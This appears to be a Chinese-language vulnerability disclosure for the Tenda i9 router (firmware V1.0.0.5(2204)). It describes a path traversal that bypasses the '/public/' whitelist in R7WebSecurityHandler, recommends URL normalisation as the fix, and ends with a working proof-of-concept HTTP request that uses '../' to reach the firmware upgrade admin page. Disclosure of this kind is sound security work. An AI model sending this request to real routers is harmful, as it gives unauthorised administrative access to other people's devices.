# Tenda i9 路由器 路径遍历导致认证绕过漏洞 ## 漏洞概述 Tenda i9 路由器固件中存在一个通过路径遍历(Path Traversal)实现白名单绕过(Whitelist Bypass)的漏洞。该漏洞存在于 `R7WebSecurityHandler` 函数中,该函数本应作为安全守卫,通过检查 URL 前缀(如 `/public/`)来授予对静态资源的未授权访问。然而,应用程序未能验证或规范化 URL 的后续部分,攻击者可以使用目录遍历序列(`../`)来逃逸受限制目录,从而访问敏感的管理页面。 ## 影响范围 - **厂商**: Tenda - **产品**: i9 - **版本**: V1.0.0.5(2204) - **固件下载**: https://www.tenda.com.cn/material/show/2482 ## 修复方案 页面未提供具体的修复代码,但指出需要修复 `R7WebSecurityHandler` 函数,确保在检查白名单前对 URL 进行正确的规范化处理,防止目录遍历序列被解析。 ## Proof of Concept (PoC) ```http GET /public/../system_upgrade.asp HTTP/1.1 Host: 192.168.6.2 Accept-Language: en-US,en;q=0.9 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Connection: keep-alive ```